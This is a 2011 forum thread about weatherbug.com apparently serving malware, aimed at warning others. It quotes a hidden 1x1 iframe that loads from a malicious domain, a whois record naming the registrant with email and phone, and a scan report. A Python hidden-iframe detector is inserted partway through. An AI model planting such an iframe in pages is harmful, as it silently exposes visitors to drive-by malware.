Weatherbug.com Malware!

mketsdev1
Posts: 3
Joined: Mon Feb 14, 2011 4:36 am

Weatherbug.com Malware!

Post by mketsdev1 » Mon Feb 14, 2011 4:36 am

Yesterday I went in to Weatherbug.com, which I have been doing for years. I noticed a funny Java download rectangle on the screen, and then my computer started beeping as my Symantec began blocking something malicious. There were hundreds of repeat blockage messages. Then my whole desktop was taken over by a bogus "virus" scan, which froze up my whole system. I couldn't close the malware or open anything else. I shut down my system and had my son-in-law, who is an IT person, come over and it took him about 20 minutes to get rid of whatever it was......so Weatherbug has a bug! Anybody else having this problem?

Figure10
Posts: 139
Joined: Sun Jun 20, 2010 9:46 pm

RE: Weatherbug.com Malware!

Post by Figure10 » Mon Feb 14, 2011 5:18 am

Whatever it is, URLVoid doesn't know about it.
I ❤ WOT

c۞g
Posts: 10927
Joined: Mon Jan 05, 2009 4:02 am

RE: Weatherbug.com Malware!

Post by c۞g » Mon Feb 14, 2011 5:54 am

weatherbug.com has been compromised

There is an iFrame located in the source, from a direct visit:

<iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
</iframe>


That site when visited directly redirects to google.com
with the full URL: hxxp://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1
it loads a page requiring that Java be installed - I get "missing plug-in" warning since I keep Java disabled *always*

If you use weatherbug, you have the facility to contact their support.
Inform them their site has been compromised and request they remove the hidden iFrame.

Whois information for: x4fw.co.cc
via: http://www.co.cc/whois/whois.php

Registrar : CO.CC, INC.
Whois Server : co.cc
Referral URL : http://www.co.cc
Service Type : ZONE RECORD

Updated Date : 10-Feb-2011
Creation Date : 10-Feb-2011
Expiration Date : 10-Feb-2012

Registrant

Evgeniy Smirnov
Moscow, Moscow
RUSSIAN FEDERATION
Email : evgeny.smirnov@mail.ru
Phone : +74952583212

Updated Date : 09-Feb-2011
Creation Date : 09-Feb-2011


Thanks for the alert.

I submitted an abuse report to CO.CC to pull the domain
http://www.co.cc/prosecution/prosecution.php
I suggest others do the same

Rated
Malicious content:
x4fw.co.cc

[edit]

here's a source chart image for:

∞ Opto, ergo sum
_https://en.wikipedia.org/wiki/And_You_and_I
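
The hidden iFrame described in the post above can be looked for mechanically in saved page source. The following Python is an added example, not part of the original thread or any poster's code; the name find_hidden_iframes, the markup around the quoted iFrame and the 0-1 pixel threshold are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the second iframe is the one quoted in the thread;
# the rest of the markup is made up for this example.
SAMPLE_HTML = """<html><body>
<iframe src="/widgets/radar.html" width="600" height="400"></iframe>
<iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
</iframe>
<iframe src="http://ads.example.org/banner" width="300" height="250"></iframe>
</body></html>"""

HIDING_STYLES = ("visibility:hidden", "display:none")


def _tiny(value):
    """True when a width/height attribute is 0 or 1 (optionally with 'px')."""
    return re.fullmatch(r"0*[01](px)?", (value or "").strip().lower()) is not None


class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        reasons = [s for s in HIDING_STYLES if s in style]
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny-dimensions")
        host = urlparse(a.get("src", "")).hostname  # None for relative URLs
        off_site = host is not None and host != self.page_host \
            and not host.endswith("." + self.page_host)
        # Report only frames that are both concealed and loaded from another host.
        if reasons and off_site:
            self.findings.append({"src": a["src"], "host": host, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return hidden, off-site iframes found in html served by page_host."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings
```

A visible third-party frame, such as an ordinary ad slot, is not reported; only frames that are both concealed and served from another host are.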


Satchman
Posts: 691
Joined: Mon Dec 28, 2009 1:08 pm

RE: Weatherbug.com Malware!

Post by Satchman » Tue Feb 15, 2011 4:00 am

Checking the box for a recent re-scan of the website by www.urlvoid.com shows that this site has been infected.

Report 2011-02-15 04:17:03 (GMT 1)
File Name weatherbug-com
File Size 49276 bytes
File Type Unknown file
MD5 Hash a310f04fb9c28f16b3b7e2eb39142eff
SHA1 Hash 40d348387481cfb4f7ffe5a89559ee7c36c6c62d
Detections: 1 / 16 (6 %)
Status INFECTED

Antivirus      Updated     Engine      Result
a-squared      15/02/2011  5.0.0.20    -
Avast          15/02/2011  5.0         -
AVG            15/02/2011  9.0.0.725   -
Avira AntiVir  15/02/2011  7.6.0.59    -
BitDefender    15/02/2011  7.0.0.2555  -
ClamAV         15/02/2011  0.96.2.1    -
Comodo         15/02/2011  4.0         -
Dr.Web         15/02/2011  5.00.0      -
F-PROT6        15/02/2011  4.6.1.107   -
Ikarus T3      15/02/2011  1001084     -
Kaspersky      15/02/2011  9.0.0.736   -
NOD32          15/02/2011  4.2.42.0    -
Panda          15/02/2011  10.0.3.0    -
TrendMicro     15/02/2011  9.120-1004  -
VBA32          15/02/2011  3.12.14.1   Malware.HTML.Iframe
VirusBuster    15/02/2011  1.5.6

Satch

WeatherBug1
Posts: 1
Joined: Tue Feb 15, 2011 2:44 pm

RE: Weatherbug.com Malware!

Post by WeatherBug1 » Tue Feb 15, 2011 2:44 pm

I represent WeatherBug. We have looked into this issue and could not find any offending code. Any issue was likely caused by an ad served through a third party ad network. We will be monitoring our ads to avoid any future occurrences.

mketsdev1
Posts: 3
Joined: Mon Feb 14, 2011 4:36 am

RE: Weatherbug.com Malware!

Post by mketsdev1 » Sat Feb 19, 2011 3:28 pm

Thank you! I miss being able to check my local weather stations!

Guest

RE: Weatherbug.com Malware!

Post by Guest » Sat Feb 19, 2011 4:28 pm

Gave up on WeatherBug long time back.
Been dangerous for years to use.
List of reasons a mile long.

Have some fun and Google
http://www.google.com/search?q=weatherbug+spyware&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

http://www.google.com/search?q=weatherbug+issues&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

http://www.google.com/search?q=weatherbug+malware&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

siblingshot
Posts: 443
Joined: Fri Jan 21, 2011 7:22 pm

RE: Weatherbug.com Malware!

Post by siblingshot » Sat Feb 19, 2011 4:50 pm

Interesting, DT.

I use WeatherBug and noticed - from g7w's post - that it had been compromised. In light of that, and your own pointers, it may be high time to drop a little rain on this addon. Rinse my hands. Wash it away.

The nomenclature itself is a little ironic.

Satchman
Posts: 691
Joined: Mon Dec 28, 2009 1:08 pm

RE: Weatherbug.com Malware!

Post by Satchman » Sat Feb 19, 2011 5:59 pm

I remember a history of malware from Weatherbug that goes back at least five years, maybe more. It comes and goes and the site is too much of a risk. They used to put toolbars in people's browsers that AV and scanners would diagnose as malware. There's so much better weather information and sites out there than Weatherbug. I love Yahoo Weather! Nothing to install or download and it is very detailed and accurate.

Satch

Guest

RE: Weatherbug.com Malware!

Post by Guest » Sat Feb 19, 2011 6:20 pm

I just prefer to look at METAR reports, and the easiest way is to download this: http://www.nirsoft.net/utils/mweather.html
The other method is to step outside. ~smiles~
